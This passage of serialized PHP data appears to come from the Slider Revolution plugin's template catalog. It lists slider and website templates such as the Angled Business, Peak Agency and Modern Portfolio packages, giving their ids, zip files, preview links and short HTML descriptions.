Portfolio\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"19\";s:9:\"installed\";b:0;}i:287;a:25:{s:2:\"id\";s:3:\"296\";s:5:\"title\";s:23:\"Minimal Portfolio Modal\";s:5:\"alias\";s:23:\"minimal-portfolio-modal\";s:3:\"zip\";s:33:\"packs/minimal-portfolio-modal.zip\";s:3:\"uid\";s:32:\"6874e6cec3663670f209a8d8a4f26b16\";s:3:\"img\";s:34:\"minimal-portfolio-modal/slide1.jpg\";s:7:\"preview\";s:69:\"https://revolution.themepunch.com/minimal-portfolio-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">The Minimal Portfolio template is a slide based website with additional modal detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Minimal Portfolio\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"19\";s:9:\"installed\";b:0;}i:288;a:25:{s:2:\"id\";s:3:\"297\";s:5:\"title\";s:23:\"Angled Business Website\";s:5:\"alias\";s:23:\"angled-business-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:31:\"angled-business-website-package\";s:3:\"img\";s:27:\"packages/angled_package.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/angled-business-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Angled Business\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"20\";s:9:\"installed\";b:0;}i:289;a:25:{s:2:\"id\";s:3:\"298\";s:5:\"title\";s:11:\"Angled Menu\";s:5:\"alias\";s:11:\"angled-menu\";s:3:\"zip\";s:21:\"packs/angled-menu.zip\";s:3:\"uid\";s:32:\"2fe0c4682d1231ee3918be9e4fcb1837\";s:3:\"img\";s:22:\"angled-menu/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/angled-business-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Angled Business\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"20\";s:9:\"installed\";b:0;}i:290;a:25:{s:2:\"id\";s:3:\"299\";s:5:\"title\";s:13:\"Angled Header\";s:5:\"alias\";s:13:\"angled-header\";s:3:\"zip\";s:23:\"packs/angled-header.zip\";s:3:\"uid\";s:32:\"09462601d4edca8dff899de6f666dc47\";s:3:\"img\";s:24:\"angled-header/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/angled-business-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Angled Business\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"20\";s:9:\"installed\";b:0;}i:291;a:25:{s:2:\"id\";s:3:\"300\";s:5:\"title\";s:11:\"Angled News\";s:5:\"alias\";s:11:\"angled-news\";s:3:\"zip\";s:21:\"packs/angled-news.zip\";s:3:\"uid\";s:32:\"b315105763ed91214cb2f0ac12615729\";s:3:\"img\";s:22:\"angled-news/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/angled-business-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Angled Business\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"20\";s:9:\"installed\";b:0;}i:292;a:25:{s:2:\"id\";s:3:\"301\";s:5:\"title\";s:15:\"Angled Services\";s:5:\"alias\";s:15:\"angled-services\";s:3:\"zip\";s:25:\"packs/angled-services.zip\";s:3:\"uid\";s:32:\"7605651c1487e1a6c32edc70017be8ad\";s:3:\"img\";s:26:\"angled-services/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/angled-business-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Angled Business\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"20\";s:9:\"installed\";b:0;}i:293;a:25:{s:2:\"id\";s:3:\"302\";s:5:\"title\";s:14:\"Angled Success\";s:5:\"alias\";s:14:\"angled-success\";s:3:\"zip\";s:24:\"packs/angled-success.zip\";s:3:\"uid\";s:32:\"9e3fa974a42ecf80e1ec6ff991fca430\";s:3:\"img\";s:25:\"angled-success/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/angled-business-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Angled Business\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"20\";s:9:\"installed\";b:0;}i:294;a:25:{s:2:\"id\";s:3:\"303\";s:5:\"title\";s:13:\"Angled Footer\";s:5:\"alias\";s:13:\"angled-footer\";s:3:\"zip\";s:23:\"packs/angled-footer.zip\";s:3:\"uid\";s:32:\"aed4eaa2f7883351ba9c9947feef153e\";s:3:\"img\";s:24:\"angled-footer/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/angled-business-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Angled Business\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"20\";s:9:\"installed\";b:0;}i:295;a:25:{s:2:\"id\";s:3:\"304\";s:5:\"title\";s:20:\"Angled Content Modal\";s:5:\"alias\";s:20:\"angled-content-modal\";s:3:\"zip\";s:30:\"packs/angled-content-modal.zip\";s:3:\"uid\";s:32:\"4ddc74515fdf84f974217e4ed47a7c66\";s:3:\"img\";s:31:\"angled-content-modal/slide1.jpg\";s:7:\"preview\";s:67:\"https://revolution.themepunch.com/angled-business-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Angled Business Website template is a geometric, parallax one-page website with modal based detail pages.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Angled Business\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"20\";s:9:\"installed\";b:0;}i:296;a:22:{s:2:\"id\";s:3:\"312\";s:5:\"title\";s:24:\"Retouch Before and After\";s:5:\"alias\";s:7:\"Retouch\";s:3:\"zip\";s:11:\"Retouch.zip\";s:3:\"uid\";s:32:\"58894991f1abd8b448c8d353b1b5fe76\";s:3:\"img\";s:18:\"Retouch/slide1.jpg\";s:7:\"preview\";s:61:\"http://revolution.themepunch.com/retouch-before-after-slider/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:155:\"<span class=\"ttm_content\">The Retouch Slider is the perfect way to compare your photos before and after retouching.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-beforeafter-addon\\/revslider-beforeafter-addon.php\",\"name\":\"Before After AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:297;a:22:{s:2:\"id\";s:3:\"313\";s:5:\"title\";s:11:\"Tech Slider\";s:5:\"alias\";s:11:\"tech-slider\";s:3:\"zip\";s:15:\"tech-slider.zip\";s:3:\"uid\";s:32:\"a98e2b264f00a1116d21808c6a543162\";s:3:\"img\";s:22:\"tech-slider/slide1.jpg\";s:7:\"preview\";s:63:\"http://revolution.themepunch.com/tech-showcase-slider-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:153:\"<span class=\"ttm_content\">This classic slider module with sleek device mockups features a smooth parallax effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:298;a:25:{s:2:\"id\";s:3:\"314\";s:5:\"title\";s:19:\"Peak Agency Website\";s:5:\"alias\";s:19:\"peak-agency-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:27:\"peak-agency-website-package\";s:3:\"img\";s:25:\"packages/peak_package.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/peak-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:129:\"<span class=\"ttm_content\">The Peak Agency Website template is a minimal, light one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Peak Agency\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"22\";s:9:\"installed\";b:0;}i:299;a:25:{s:2:\"id\";s:3:\"315\";s:5:\"title\";s:11:\"Peak Header\";s:5:\"alias\";s:11:\"peak-header\";s:3:\"zip\";s:21:\"packs/peak-header.zip\";s:3:\"uid\";s:32:\"b721bd612e9fbc5182418ad3fd7d0808\";s:3:\"img\";s:22:\"peak-header/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/peak-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:129:\"<span class=\"ttm_content\">The Peak Agency Website template is a minimal, light one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Peak Agency\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"22\";s:9:\"installed\";b:0;}i:300;a:25:{s:2:\"id\";s:3:\"316\";s:5:\"title\";s:10:\"Peak About\";s:5:\"alias\";s:10:\"peak-about\";s:3:\"zip\";s:20:\"packs/peak-about.zip\";s:3:\"uid\";s:32:\"7e68b1012fb03490d45c7f79e8cb1b19\";s:3:\"img\";s:21:\"peak-about/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/peak-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:129:\"<span class=\"ttm_content\">The Peak Agency Website template is a minimal, light one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Peak Agency\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"22\";s:9:\"installed\";b:0;}i:301;a:25:{s:2:\"id\";s:3:\"317\";s:5:\"title\";s:14:\"Peak Portfolio\";s:5:\"alias\";s:14:\"peak-portfolio\";s:3:\"zip\";s:24:\"packs/peak-portfolio.zip\";s:3:\"uid\";s:32:\"6198d1885ba9e95221c33e404f21bdbc\";s:3:\"img\";s:25:\"peak-portfolio/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/peak-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:129:\"<span class=\"ttm_content\">The Peak Agency Website template is a minimal, light one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Peak Agency\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"22\";s:9:\"installed\";b:0;}i:302;a:25:{s:2:\"id\";s:3:\"318\";s:5:\"title\";s:11:\"Peak Footer\";s:5:\"alias\";s:11:\"peak-footer\";s:3:\"zip\";s:21:\"packs/peak-footer.zip\";s:3:\"uid\";s:32:\"2dead6897ad3b3a709b380d81242f76b\";s:3:\"img\";s:22:\"peak-footer/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/peak-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:129:\"<span class=\"ttm_content\">The Peak Agency Website template is a minimal, light one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:11:\"Peak Agency\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"22\";s:9:\"installed\";b:0;}i:303;a:25:{s:2:\"id\";s:3:\"319\";s:5:\"title\";s:24:\"Modern Portfolio Website\";s:5:\"alias\";s:24:\"modern-portfolio-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:32:\"modern-portfolio-website-package\";s:3:\"img\";s:30:\"packages/portfolio-package.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/modern-portfolio-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:145:\"<span class=\"ttm_content\">A modern portfolio template with fancy scroll animations and a colorful design.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"Modern Portfolio\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"23\";s:9:\"installed\";b:0;}i:304;a:25:{s:2:\"id\";s:3:\"320\";s:5:\"title\";s:17:\"Portfolio Welcome\";s:5:\"alias\";s:17:\"portfolio-welcome\";s:3:\"zip\";s:27:\"packs/portfolio-welcome.zip\";s:3:\"uid\";s:32:\"97336b8785e4a7b27facaf1547e0464d\";s:3:\"img\";s:28:\"portfolio-welcome/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/modern-portfolio-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:145:\"<span class=\"ttm_content\">A modern portfolio template with fancy scroll animations and a colorful design.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"Modern Portfolio\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"23\";s:9:\"installed\";b:0;}i:305;a:25:{s:2:\"id\";s:3:\"321\";s:5:\"title\";s:15:\"Portfolio 